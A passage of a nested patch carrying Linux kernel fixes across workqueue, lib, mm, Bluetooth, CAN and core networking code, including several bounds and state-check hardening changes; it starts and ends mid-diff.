+ 	 * wq_unbound_cpumask, we fallback to the wq_unbound_cpumask.
+ 	 */
+ 	copy_workqueue_attrs(new_attrs, attrs);
+-	cpumask_and(new_attrs->cpumask, new_attrs->cpumask, wq_unbound_cpumask);
++	cpumask_and(new_attrs->cpumask, new_attrs->cpumask, unbound_cpumask);
+ 	if (unlikely(cpumask_empty(new_attrs->cpumask)))
+-		cpumask_copy(new_attrs->cpumask, wq_unbound_cpumask);
++		cpumask_copy(new_attrs->cpumask, unbound_cpumask);
+ 
+ 	/*
+ 	 * We may create multiple pwqs with differing cpumasks.  Make a
+@@ -4072,7 +4074,7 @@ static int apply_workqueue_attrs_locked(struct workqueue_struct *wq,
+ 		wq->flags &= ~__WQ_ORDERED;
+ 	}
+ 
+-	ctx = apply_wqattrs_prepare(wq, attrs);
++	ctx = apply_wqattrs_prepare(wq, attrs, wq_unbound_cpumask);
+ 	if (!ctx)
+ 		return -ENOMEM;
+ 
+@@ -5334,7 +5336,7 @@ out_unlock:
+ }
+ #endif /* CONFIG_FREEZER */
+ 
+-static int workqueue_apply_unbound_cpumask(void)
++static int workqueue_apply_unbound_cpumask(const cpumask_var_t unbound_cpumask)
+ {
+ 	LIST_HEAD(ctxs);
+ 	int ret = 0;
+@@ -5350,7 +5352,7 @@ static int workqueue_apply_unbound_cpumask(void)
+ 		if (wq->flags & __WQ_ORDERED)
+ 			continue;
+ 
+-		ctx = apply_wqattrs_prepare(wq, wq->unbound_attrs);
++		ctx = apply_wqattrs_prepare(wq, wq->unbound_attrs, unbound_cpumask);
+ 		if (!ctx) {
+ 			ret = -ENOMEM;
+ 			break;
+@@ -5365,6 +5367,11 @@ static int workqueue_apply_unbound_cpumask(void)
+ 		apply_wqattrs_cleanup(ctx);
+ 	}
+ 
++	if (!ret) {
++		mutex_lock(&wq_pool_attach_mutex);
++		cpumask_copy(wq_unbound_cpumask, unbound_cpumask);
++		mutex_unlock(&wq_pool_attach_mutex);
++	}
+ 	return ret;
+ }
+ 
+@@ -5383,7 +5390,6 @@ static int workqueue_apply_unbound_cpumask(void)
+ int workqueue_set_unbound_cpumask(cpumask_var_t cpumask)
+ {
+ 	int ret = -EINVAL;
+-	cpumask_var_t saved_cpumask;
+ 
+ 	/*
+ 	 * Not excluding isolated cpus on purpose.
+@@ -5397,23 +5403,8 @@ int workqueue_set_unbound_cpumask(cpumask_var_t cpumask)
+ 			goto out_unlock;
+ 		}
+ 
+-		if (!zalloc_cpumask_var(&saved_cpumask, GFP_KERNEL)) {
+-			ret = -ENOMEM;
+-			goto out_unlock;
+-		}
+-
+-		/* save the old wq_unbound_cpumask. */
+-		cpumask_copy(saved_cpumask, wq_unbound_cpumask);
+-
+-		/* update wq_unbound_cpumask at first and apply it to wqs. */
+-		cpumask_copy(wq_unbound_cpumask, cpumask);
+-		ret = workqueue_apply_unbound_cpumask();
+-
+-		/* restore the wq_unbound_cpumask when failed. */
+-		if (ret < 0)
+-			cpumask_copy(wq_unbound_cpumask, saved_cpumask);
++		ret = workqueue_apply_unbound_cpumask(cpumask);
+ 
+-		free_cpumask_var(saved_cpumask);
+ out_unlock:
+ 		apply_wqattrs_unlock();
+ 	}
+diff --git a/lib/bug.c b/lib/bug.c
+index c223a2575b721..e0ff219899902 100644
+--- a/lib/bug.c
++++ b/lib/bug.c
+@@ -47,6 +47,7 @@
+ #include <linux/sched.h>
+ #include <linux/rculist.h>
+ #include <linux/ftrace.h>
++#include <linux/context_tracking.h>
+ 
+ extern struct bug_entry __start___bug_table[], __stop___bug_table[];
+ 
+@@ -153,7 +154,7 @@ struct bug_entry *find_bug(unsigned long bugaddr)
+ 	return module_find_bug(bugaddr);
+ }
+ 
+-enum bug_trap_type report_bug(unsigned long bugaddr, struct pt_regs *regs)
++static enum bug_trap_type __report_bug(unsigned long bugaddr, struct pt_regs *regs)
+ {
+ 	struct bug_entry *bug;
+ 	const char *file;
+@@ -209,6 +210,18 @@ enum bug_trap_type report_bug(unsigned long bugaddr, struct pt_regs *regs)
+ 	return BUG_TRAP_TYPE_BUG;
+ }
+ 
++enum bug_trap_type report_bug(unsigned long bugaddr, struct pt_regs *regs)
++{
++	enum bug_trap_type ret;
++	bool rcu = false;
++
++	rcu = warn_rcu_enter();
++	ret = __report_bug(bugaddr, regs);
++	warn_rcu_exit(rcu);
++
++	return ret;
++}
++
+ static void clear_once_table(struct bug_entry *start, struct bug_entry *end)
+ {
+ 	struct bug_entry *bug;
+diff --git a/lib/errname.c b/lib/errname.c
+index 05cbf731545f0..67739b174a8cc 100644
+--- a/lib/errname.c
++++ b/lib/errname.c
+@@ -21,6 +21,7 @@ static const char *names_0[] = {
+ 	E(EADDRNOTAVAIL),
+ 	E(EADV),
+ 	E(EAFNOSUPPORT),
++	E(EAGAIN), /* EWOULDBLOCK */
+ 	E(EALREADY),
+ 	E(EBADE),
+ 	E(EBADF),
+@@ -31,15 +32,17 @@ static const char *names_0[] = {
+ 	E(EBADSLT),
+ 	E(EBFONT),
+ 	E(EBUSY),
+-#ifdef ECANCELLED
+-	E(ECANCELLED),
+-#endif
++	E(ECANCELED), /* ECANCELLED */
+ 	E(ECHILD),
+ 	E(ECHRNG),
+ 	E(ECOMM),
+ 	E(ECONNABORTED),
++	E(ECONNREFUSED), /* EREFUSED */
+ 	E(ECONNRESET),
++	E(EDEADLK), /* EDEADLOCK */
++#if EDEADLK != EDEADLOCK /* mips, sparc, powerpc */
+ 	E(EDEADLOCK),
++#endif
+ 	E(EDESTADDRREQ),
+ 	E(EDOM),
+ 	E(EDOTDOT),
+@@ -166,14 +169,17 @@ static const char *names_0[] = {
+ 	E(EUSERS),
+ 	E(EXDEV),
+ 	E(EXFULL),
+-
+-	E(ECANCELED), /* ECANCELLED */
+-	E(EAGAIN), /* EWOULDBLOCK */
+-	E(ECONNREFUSED), /* EREFUSED */
+-	E(EDEADLK), /* EDEADLOCK */
+ };
+ #undef E
+ 
++#ifdef EREFUSED /* parisc */
++static_assert(EREFUSED == ECONNREFUSED);
++#endif
++#ifdef ECANCELLED /* parisc */
++static_assert(ECANCELLED == ECANCELED);
++#endif
++static_assert(EAGAIN == EWOULDBLOCK); /* everywhere */
++
+ #define E(err) [err - 512 + BUILD_BUG_ON_ZERO(err < 512 || err > 550)] = "-" #err
+ static const char *names_512[] = {
+ 	E(ERESTARTSYS),
+diff --git a/lib/kobject.c b/lib/kobject.c
+index a0b2dbfcfa233..aa375a5d94419 100644
+--- a/lib/kobject.c
++++ b/lib/kobject.c
+@@ -94,10 +94,10 @@ static int create_dir(struct kobject *kobj)
+ 	return 0;
+ }
+ 
+-static int get_kobj_path_length(struct kobject *kobj)
++static int get_kobj_path_length(const struct kobject *kobj)
+ {
+ 	int length = 1;
+-	struct kobject *parent = kobj;
++	const struct kobject *parent = kobj;
+ 
+ 	/* walk up the ancestors until we hit the one pointing to the
+ 	 * root.
+@@ -112,21 +112,25 @@ static int get_kobj_path_length(struct kobject *kobj)
+ 	return length;
+ }
+ 
+-static void fill_kobj_path(struct kobject *kobj, char *path, int length)
++static int fill_kobj_path(const struct kobject *kobj, char *path, int length)
+ {
+-	struct kobject *parent;
++	const struct kobject *parent;
+ 
+ 	--length;
+ 	for (parent = kobj; parent; parent = parent->parent) {
+ 		int cur = strlen(kobject_name(parent));
+ 		/* back up enough to print this name with '/' */
+ 		length -= cur;
++		if (length <= 0)
++			return -EINVAL;
+ 		memcpy(path + length, kobject_name(parent), cur);
+ 		*(path + --length) = '/';
+ 	}
+ 
+ 	pr_debug("kobject: '%s' (%p): %s: path = '%s'\n", kobject_name(kobj),
+ 		 kobj, __func__, path);
++
++	return 0;
+ }
+ 
+ /**
+@@ -136,18 +140,22 @@ static void fill_kobj_path(struct kobject *kobj, char *path, int length)
+  *
+  * Return: The newly allocated memory, caller must free with kfree().
+  */
+-char *kobject_get_path(struct kobject *kobj, gfp_t gfp_mask)
++char *kobject_get_path(const struct kobject *kobj, gfp_t gfp_mask)
+ {
+ 	char *path;
+ 	int len;
+ 
++retry:
+ 	len = get_kobj_path_length(kobj);
+ 	if (len == 0)
+ 		return NULL;
+ 	path = kzalloc(len, gfp_mask);
+ 	if (!path)
+ 		return NULL;
+-	fill_kobj_path(kobj, path, len);
++	if (fill_kobj_path(kobj, path, len)) {
++		kfree(path);
++		goto retry;
++	}
+ 
+ 	return path;
+ }
+diff --git a/lib/mpi/mpicoder.c b/lib/mpi/mpicoder.c
+index 39c4c67310946..3cb6bd148fa9e 100644
+--- a/lib/mpi/mpicoder.c
++++ b/lib/mpi/mpicoder.c
+@@ -504,7 +504,8 @@ MPI mpi_read_raw_from_sgl(struct scatterlist *sgl, unsigned int nbytes)
+ 
+ 	while (sg_miter_next(&miter)) {
+ 		buff = miter.addr;
+-		len = miter.length;
++		len = min_t(unsigned, miter.length, nbytes);
++		nbytes -= len;
+ 
+ 		for (x = 0; x < len; x++) {
+ 			a <<= 8;
+diff --git a/lib/sbitmap.c b/lib/sbitmap.c
+index 7280ae8ca88c7..c515072eca296 100644
+--- a/lib/sbitmap.c
++++ b/lib/sbitmap.c
+@@ -434,6 +434,8 @@ int sbitmap_queue_init_node(struct sbitmap_queue *sbq, unsigned int depth,
+ 	sbq->wake_batch = sbq_calc_wake_batch(sbq, depth);
+ 	atomic_set(&sbq->wake_index, 0);
+ 	atomic_set(&sbq->ws_active, 0);
++	atomic_set(&sbq->completion_cnt, 0);
++	atomic_set(&sbq->wakeup_cnt, 0);
+ 
+ 	sbq->ws = kzalloc_node(SBQ_WAIT_QUEUES * sizeof(*sbq->ws), flags, node);
+ 	if (!sbq->ws) {
+@@ -441,54 +443,33 @@ int sbitmap_queue_init_node(struct sbitmap_queue *sbq, unsigned int depth,
+ 		return -ENOMEM;
+ 	}
+ 
+-	for (i = 0; i < SBQ_WAIT_QUEUES; i++) {
++	for (i = 0; i < SBQ_WAIT_QUEUES; i++)
+ 		init_waitqueue_head(&sbq->ws[i].wait);
+-		atomic_set(&sbq->ws[i].wait_cnt, sbq->wake_batch);
+-	}
+ 
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(sbitmap_queue_init_node);
+ 
+-static inline void __sbitmap_queue_update_wake_batch(struct sbitmap_queue *sbq,
+-					    unsigned int wake_batch)
+-{
+-	int i;
+-
+-	if (sbq->wake_batch != wake_batch) {
+-		WRITE_ONCE(sbq->wake_batch, wake_batch);
+-		/*
+-		 * Pairs with the memory barrier in sbitmap_queue_wake_up()
+-		 * to ensure that the batch size is updated before the wait
+-		 * counts.
+-		 */
+-		smp_mb();
+-		for (i = 0; i < SBQ_WAIT_QUEUES; i++)
+-			atomic_set(&sbq->ws[i].wait_cnt, 1);
+-	}
+-}
+-
+ static void sbitmap_queue_update_wake_batch(struct sbitmap_queue *sbq,
+ 					    unsigned int depth)
+ {
+ 	unsigned int wake_batch;
+ 
+ 	wake_batch = sbq_calc_wake_batch(sbq, depth);
+-	__sbitmap_queue_update_wake_batch(sbq, wake_batch);
++	if (sbq->wake_batch != wake_batch)
++		WRITE_ONCE(sbq->wake_batch, wake_batch);
+ }
+ 
+ void sbitmap_queue_recalculate_wake_batch(struct sbitmap_queue *sbq,
+ 					    unsigned int users)
+ {
+ 	unsigned int wake_batch;
+-	unsigned int min_batch;
+ 	unsigned int depth = (sbq->sb.depth + users - 1) / users;
+ 
+-	min_batch = sbq->sb.depth >= (4 * SBQ_WAIT_QUEUES) ? 4 : 1;
+-
+ 	wake_batch = clamp_val(depth / SBQ_WAIT_QUEUES,
+-			min_batch, SBQ_WAKE_BATCH);
+-	__sbitmap_queue_update_wake_batch(sbq, wake_batch);
++			1, SBQ_WAKE_BATCH);
++
++	WRITE_ONCE(sbq->wake_batch, wake_batch);
+ }
+ EXPORT_SYMBOL_GPL(sbitmap_queue_recalculate_wake_batch);
+ 
+@@ -537,11 +518,9 @@ unsigned long __sbitmap_queue_get_batch(struct sbitmap_queue *sbq, int nr_tags,
+ 
+ 			get_mask = ((1UL << nr_tags) - 1) << nr;
+ 			val = READ_ONCE(map->word);
+-			do {
+-				if ((val & ~get_mask) != val)
+-					goto next;
+-			} while (!atomic_long_try_cmpxchg(ptr, &val,
+-							  get_mask | val));
++			while (!atomic_long_try_cmpxchg(ptr, &val,
++							  get_mask | val))
++				;
+ 			get_mask = (get_mask & ~val) >> nr;
+ 			if (get_mask) {
+ 				*offset = nr + (index << sb->shift);
+@@ -576,106 +555,56 @@ void sbitmap_queue_min_shallow_depth(struct sbitmap_queue *sbq,
+ }
+ EXPORT_SYMBOL_GPL(sbitmap_queue_min_shallow_depth);
+ 
+-static struct sbq_wait_state *sbq_wake_ptr(struct sbitmap_queue *sbq)
++static void __sbitmap_queue_wake_up(struct sbitmap_queue *sbq, int nr)
+ {
+ 	int i, wake_index;
+ 
+ 	if (!atomic_read(&sbq->ws_active))
+-		return NULL;
++		return;
+ 
+ 	wake_index = atomic_read(&sbq->wake_index);
+ 	for (i = 0; i < SBQ_WAIT_QUEUES; i++) {
+ 		struct sbq_wait_state *ws = &sbq->ws[wake_index];
+ 
+-		if (waitqueue_active(&ws->wait) && atomic_read(&ws->wait_cnt)) {
+-			if (wake_index != atomic_read(&sbq->wake_index))
+-				atomic_set(&sbq->wake_index, wake_index);
+-			return ws;
+-		}
+-
++		/*
++		 * Advance the index before checking the current queue.
++		 * This improves fairness by ensuring the queue doesn't
++		 * need to be fully emptied before trying to wake up
++		 * from the next one.
++		 */
+ 		wake_index = sbq_index_inc(wake_index);
++
++		/*
++		 * It is sufficient to wake up at least one waiter to
++		 * guarantee forward progress.
++		 */
++		if (waitqueue_active(&ws->wait) &&
++		    wake_up_nr(&ws->wait, nr))
++			break;
+ 	}
+ 
+-	return NULL;
++	if (wake_index != atomic_read(&sbq->wake_index))
++		atomic_set(&sbq->wake_index, wake_index);
+ }
+ 
+-static bool __sbq_wake_up(struct sbitmap_queue *sbq, int *nr)
++void sbitmap_queue_wake_up(struct sbitmap_queue *sbq, int nr)
+ {
+-	struct sbq_wait_state *ws;
+-	unsigned int wake_batch;
+-	int wait_cnt, cur, sub;
+-	bool ret;
++	unsigned int wake_batch = READ_ONCE(sbq->wake_batch);
++	unsigned int wakeups;
+ 
+-	if (*nr <= 0)
+-		return false;
++	if (!atomic_read(&sbq->ws_active))
++		return;
+ 
+-	ws = sbq_wake_ptr(sbq);
+-	if (!ws)
+-		return false;
++	atomic_add(nr, &sbq->completion_cnt);
++	wakeups = atomic_read(&sbq->wakeup_cnt);
+ 
+-	cur = atomic_read(&ws->wait_cnt);
+ 	do {
+-		/*
+-		 * For concurrent callers of this, callers should call this
+-		 * function again to wakeup a new batch on a different 'ws'.
+-		 */
+-		if (cur == 0)
+-			return true;
+-		sub = min(*nr, cur);
+-		wait_cnt = cur - sub;
+-	} while (!atomic_try_cmpxchg(&ws->wait_cnt, &cur, wait_cnt));
+-
+-	/*
+-	 * If we decremented queue without waiters, retry to avoid lost
+-	 * wakeups.
+-	 */
+-	if (wait_cnt > 0)
+-		return !waitqueue_active(&ws->wait);
+-
+-	*nr -= sub;
+-
+-	/*
+-	 * When wait_cnt == 0, we have to be particularly careful as we are
+-	 * responsible to reset wait_cnt regardless whether we've actually
+-	 * woken up anybody. But in case we didn't wakeup anybody, we still
+-	 * need to retry.
+-	 */
+-	ret = !waitqueue_active(&ws->wait);
+-	wake_batch = READ_ONCE(sbq->wake_batch);
+-
+-	/*
+-	 * Wake up first in case that concurrent callers decrease wait_cnt
+-	 * while waitqueue is empty.
+-	 */
+-	wake_up_nr(&ws->wait, wake_batch);
++		if (atomic_read(&sbq->completion_cnt) - wakeups < wake_batch)
++			return;
++	} while (!atomic_try_cmpxchg(&sbq->wakeup_cnt,
++				     &wakeups, wakeups + wake_batch));
+ 
+-	/*
+-	 * Pairs with the memory barrier in sbitmap_queue_resize() to
+-	 * ensure that we see the batch size update before the wait
+-	 * count is reset.
+-	 *
+-	 * Also pairs with the implicit barrier between decrementing wait_cnt
+-	 * and checking for waitqueue_active() to make sure waitqueue_active()
+-	 * sees result of the wakeup if atomic_dec_return() has seen the result
+-	 * of atomic_set().
+-	 */
+-	smp_mb__before_atomic();
+-
+-	/*
+-	 * Increase wake_index before updating wait_cnt, otherwise concurrent
+-	 * callers can see valid wait_cnt in old waitqueue, which can cause
+-	 * invalid wakeup on the old waitqueue.
+-	 */
+-	sbq_index_atomic_inc(&sbq->wake_index);
+-	atomic_set(&ws->wait_cnt, wake_batch);
+-
+-	return ret || *nr;
+-}
+-
+-void sbitmap_queue_wake_up(struct sbitmap_queue *sbq, int nr)
+-{
+-	while (__sbq_wake_up(sbq, &nr))
+-		;
++	__sbitmap_queue_wake_up(sbq, wake_batch);
+ }
+ EXPORT_SYMBOL_GPL(sbitmap_queue_wake_up);
+ 
+@@ -792,9 +721,7 @@ void sbitmap_queue_show(struct sbitmap_queue *sbq, struct seq_file *m)
+ 	seq_puts(m, "ws={\n");
+ 	for (i = 0; i < SBQ_WAIT_QUEUES; i++) {
+ 		struct sbq_wait_state *ws = &sbq->ws[i];
+-
+-		seq_printf(m, "\t{.wait_cnt=%d, .wait=%s},\n",
+-			   atomic_read(&ws->wait_cnt),
++		seq_printf(m, "\t{.wait=%s},\n",
+ 			   waitqueue_active(&ws->wait) ? "active" : "inactive");
+ 	}
+ 	seq_puts(m, "}\n");
+diff --git a/mm/damon/paddr.c b/mm/damon/paddr.c
+index e1a4315c4be6a..402d30b37aba9 100644
+--- a/mm/damon/paddr.c
++++ b/mm/damon/paddr.c
+@@ -219,12 +219,11 @@ static unsigned long damon_pa_pageout(struct damon_region *r)
+ 			put_page(page);
+ 			continue;
+ 		}
+-		if (PageUnevictable(page)) {
++		if (PageUnevictable(page))
+ 			putback_lru_page(page);
+-		} else {
++		else
+ 			list_add(&page->lru, &page_list);
+-			put_page(page);
+-		}
++		put_page(page);
+ 	}
+ 	applied = reclaim_pages(&page_list);
+ 	cond_resched();
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index e7cf013a0efd0..0729973d486a6 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2818,6 +2818,9 @@ void deferred_split_huge_page(struct page *page)
+ 	if (PageSwapCache(page))
+ 		return;
+ 
++	if (!list_empty(page_deferred_list(page)))
++		return;
++
+ 	spin_lock_irqsave(&ds_queue->split_queue_lock, flags);
+ 	if (list_empty(page_deferred_list(page))) {
+ 		count_vm_event(THP_DEFERRED_SPLIT_PAGE);
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 266a1ab054341..3e8f1ad0fe9db 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -3910,6 +3910,10 @@ static int mem_cgroup_move_charge_write(struct cgroup_subsys_state *css,
+ {
+ 	struct mem_cgroup *memcg = mem_cgroup_from_css(css);
+ 
++	pr_warn_once("Cgroup memory moving (move_charge_at_immigrate) is deprecated. "
++		     "Please report your usecase to linux-mm@kvack.org if you "
++		     "depend on this functionality.\n");
++
+ 	if (val & ~MOVE_MASK)
+ 		return -EINVAL;
+ 
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index bead6bccc7f28..4457f9423e2c1 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -1020,7 +1020,7 @@ static int me_pagecache_dirty(struct page_state *ps, struct page *p)
+  * cache and swap cache(ie. page is freshly swapped in). So it could be
+  * referenced concurrently by 2 types of PTEs:
+  * normal PTEs and swap PTEs. We try to handle them consistently by calling
+- * try_to_unmap(TTU_IGNORE_HWPOISON) to convert the normal PTEs to swap PTEs,
++ * try_to_unmap(!TTU_HWPOISON) to convert the normal PTEs to swap PTEs,
+  * and then
+  *      - clear dirty bit to prevent IO
+  *      - remove from LRU
+@@ -1401,7 +1401,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 				  int flags, struct page *hpage)
+ {
+ 	struct folio *folio = page_folio(hpage);
+-	enum ttu_flags ttu = TTU_IGNORE_MLOCK | TTU_SYNC;
++	enum ttu_flags ttu = TTU_IGNORE_MLOCK | TTU_SYNC | TTU_HWPOISON;
+ 	struct address_space *mapping;
+ 	LIST_HEAD(tokill);
+ 	bool unmap_success;
+@@ -1431,7 +1431,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 
+ 	if (PageSwapCache(p)) {
+ 		pr_err("%#lx: keeping poisoned page in swap cache\n", pfn);
+-		ttu |= TTU_IGNORE_HWPOISON;
++		ttu &= ~TTU_HWPOISON;
+ 	}
+ 
+ 	/*
+@@ -1446,7 +1446,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 		if (page_mkclean(hpage)) {
+ 			SetPageDirty(hpage);
+ 		} else {
+-			ttu |= TTU_IGNORE_HWPOISON;
++			ttu &= ~TTU_HWPOISON;
+ 			pr_info("%#lx: corrupted page was clean: dropped without side effects\n",
+ 				pfn);
+ 		}
+diff --git a/mm/memory-tiers.c b/mm/memory-tiers.c
+index fa8c9d07f9ce9..ba863f46759d3 100644
+--- a/mm/memory-tiers.c
++++ b/mm/memory-tiers.c
+@@ -211,8 +211,8 @@ static struct memory_tier *find_create_memory_tier(struct memory_dev_type *memty
+ 
+ 	ret = device_register(&new_memtier->dev);
+ 	if (ret) {
+-		list_del(&memtier->list);
+-		put_device(&memtier->dev);
++		list_del(&new_memtier->list);
++		put_device(&new_memtier->dev);
+ 		return ERR_PTR(ret);
+ 	}
+ 	memtier = new_memtier;
+diff --git a/mm/rmap.c b/mm/rmap.c
+index 2ec925e5fa6a9..7da2d8d097d9b 100644
+--- a/mm/rmap.c
++++ b/mm/rmap.c
+@@ -1623,7 +1623,7 @@ static bool try_to_unmap_one(struct folio *folio, struct vm_area_struct *vma,
+ 		/* Update high watermark before we lower rss */
+ 		update_hiwater_rss(mm);
+ 
+-		if (PageHWPoison(subpage) && !(flags & TTU_IGNORE_HWPOISON)) {
++		if (PageHWPoison(subpage) && (flags & TTU_HWPOISON)) {
+ 			pteval = swp_entry_to_pte(make_hwpoison_entry(subpage));
+ 			if (folio_test_hugetlb(folio)) {
+ 				hugetlb_count_sub(folio_nr_pages(folio), mm);
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 3c3b79f2e4c03..09e7f841f149d 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -1983,16 +1983,14 @@ static void hci_iso_qos_setup(struct hci_dev *hdev, struct hci_conn *conn,
+ 		qos->latency = conn->le_conn_latency;
+ }
+ 
+-static struct hci_conn *hci_bind_bis(struct hci_conn *conn,
+-				     struct bt_iso_qos *qos)
++static void hci_bind_bis(struct hci_conn *conn,
++			 struct bt_iso_qos *qos)
+ {
+ 	/* Update LINK PHYs according to QoS preference */
+ 	conn->le_tx_phy = qos->out.phy;
+ 	conn->le_tx_phy = qos->out.phy;
+ 	conn->iso_qos = *qos;
+ 	conn->state = BT_BOUND;
+-
+-	return conn;
+ }
+ 
+ static int create_big_sync(struct hci_dev *hdev, void *data)
+@@ -2128,11 +2126,7 @@ struct hci_conn *hci_connect_bis(struct hci_dev *hdev, bdaddr_t *dst,
+ 	if (IS_ERR(conn))
+ 		return conn;
+ 
+-	conn = hci_bind_bis(conn, qos);
+-	if (!conn) {
+-		hci_conn_drop(conn);
+-		return ERR_PTR(-ENOMEM);
+-	}
++	hci_bind_bis(conn, qos);
+ 
+ 	/* Add Basic Announcement into Periodic Adv Data if BASE is set */
+ 	if (base_len && base) {
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 9fdede5fe71c7..da85768b04b76 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -2683,14 +2683,6 @@ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len)
+ 		if (IS_ERR(skb))
+ 			return PTR_ERR(skb);
+ 
+-		/* Channel lock is released before requesting new skb and then
+-		 * reacquired thus we need to recheck channel state.
+-		 */
+-		if (chan->state != BT_CONNECTED) {
+-			kfree_skb(skb);
+-			return -ENOTCONN;
+-		}
+-
+ 		l2cap_do_send(chan, skb);
+ 		return len;
+ 	}
+@@ -2735,14 +2727,6 @@ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len)
+ 		if (IS_ERR(skb))
+ 			return PTR_ERR(skb);
+ 
+-		/* Channel lock is released before requesting new skb and then
+-		 * reacquired thus we need to recheck channel state.
+-		 */
+-		if (chan->state != BT_CONNECTED) {
+-			kfree_skb(skb);
+-			return -ENOTCONN;
+-		}
+-
+ 		l2cap_do_send(chan, skb);
+ 		err = len;
+ 		break;
+@@ -2763,14 +2747,6 @@ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len)
+ 		 */
+ 		err = l2cap_segment_sdu(chan, &seg_queue, msg, len);
+ 
+-		/* The channel could have been closed while segmenting,
+-		 * check that it is still connected.
+-		 */
+-		if (chan->state != BT_CONNECTED) {
+-			__skb_queue_purge(&seg_queue);
+-			err = -ENOTCONN;
+-		}
+-
+ 		if (err)
+ 			break;
+ 
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index ca8f07f3542b8..eebe256104bc0 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -1624,6 +1624,14 @@ static struct sk_buff *l2cap_sock_alloc_skb_cb(struct l2cap_chan *chan,
+ 	if (!skb)
+ 		return ERR_PTR(err);
+ 
++	/* Channel lock is released before requesting new skb and then
++	 * reacquired, thus we need to recheck the channel state.
++	 */
++	if (chan->state != BT_CONNECTED) {
++		kfree_skb(skb);
++		return ERR_PTR(-ENOTCONN);
++	}
++
+ 	skb->priority = sk->sk_priority;
+ 
+ 	bt_cb(skb)->l2cap.chan = chan;
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index fc81d77724a13..9bc344851704e 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -1220,6 +1220,9 @@ static int isotp_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 	if (len < ISOTP_MIN_NAMELEN)
+ 		return -EINVAL;
+ 
++	if (addr->can_family != AF_CAN)
++		return -EINVAL;
++
+ 	/* sanitize tx CAN identifier */
+ 	if (tx_id & CAN_EFF_FLAG)
+ 		tx_id &= (CAN_EFF_FLAG | CAN_EFF_MASK);
+diff --git a/net/core/scm.c b/net/core/scm.c
+index 5c356f0dee30c..acb7d776fa6ec 100644
+--- a/net/core/scm.c
++++ b/net/core/scm.c
+@@ -229,6 +229,8 @@ int put_cmsg(struct msghdr * msg, int level, int type, int len, void *data)
+ 	if (msg->msg_control_is_user) {
+ 		struct cmsghdr __user *cm = msg->msg_control_user;
+ 
++		check_object_size(data, cmlen - sizeof(*cm), true);
++
+ 		if (!user_write_access_begin(cm, cmlen))
+ 			goto efault;
+ 
+diff --git a/net/core/sock.c b/net/core/sock.c
+index ba6ea61b3458b..4dfdcdfd00114 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -3359,7 +3359,7 @@ void sk_stop_timer_sync(struct sock *sk, struct timer_list *timer)
+ }
+ EXPORT_SYMBOL(sk_stop_timer_sync);
+ 
+-void sock_init_data(struct socket *sock, struct sock *sk)
++void sock_init_data_uid(struct socket *sock, struct sock *sk, kuid_t uid)
+ {
+ 	sk_init_common(sk);
+ 	sk->sk_send_head	=	NULL;
+@@ -3378,11 +3378,10 @@ void sock_init_data(struct socket *sock, struct sock *sk)
+ 		sk->sk_type	=	sock->type;
+ 		RCU_INIT_POINTER(sk->sk_wq, &sock->wq);
+ 		sock->sk	=	sk;
+-		sk->sk_uid	=	SOCK_INODE(sock)->i_uid;
+ 	} else {
+ 		RCU_INIT_POINTER(sk->sk_wq, NULL);
+-		sk->sk_uid	=	make_kuid(sock_net(sk)->user_ns, 0);
+ 	}
++	sk->sk_uid	=	uid;
+ 
+ 	rwlock_init(&sk->sk_callback_lock);
+ 	if (sk->sk_kern_sock)
+@@ -3440,6 +3439,16 @@ void sock_init_data(struct socket *sock, struct sock *sk)
+ 	refcount_set(&sk->sk_refcnt, 1);
+ 	atomic_set(&sk->sk_drops, 0);
+ }
++EXPORT_SYMBOL(sock_init_data_uid);
++
++void sock_init_data(struct socket *sock, struct sock *sk)
++{
++	kuid_t uid = sock ?
++		SOCK_INODE(sock)->i_uid :
++		make_kuid(sock_net(sk)->user_ns, 0);
++
++	sock_init_data_uid(sock, sk, uid);
++}
+ EXPORT_SYMBOL(sock_init_data);
+ 
+ void lock_sock_nested(struct sock *sk, int subclass)
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index a5711b8f4cb19..cd8b2f7a8f341 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -1008,17 +1008,7 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row,
+ 	u32 index;
+ 
+ 	if (port) {
+-		head = &hinfo->bhash[inet_bhashfn(net, port,
+-						  hinfo->bhash_size)];
+-		tb = inet_csk(sk)->icsk_bind_hash;
+-		spin_lock_bh(&head->lock);
+-		if (sk_head(&tb->owners) == sk && !sk->sk_bind_node.next) {
+-			inet_ehash_nolisten(sk, NULL, NULL);
+-			spin_unlock_bh(&head->lock);
+-			return 0;
+-		}
+-		spin_unlock(&head->lock);
+-		/* No definite answer... Walk to established hash table */
++		local_bh_disable();
+ 		ret = check_established(death_row, sk, port, NULL);
+ 		local_bh_enable();
+ 		return ret;
+diff --git a/net/l2tp/l2tp_ppp.c b/net/l2tp/l2tp_ppp.c
+index db2e584c625e5..f011af6601c9c 100644
+--- a/net/l2tp/l2tp_ppp.c
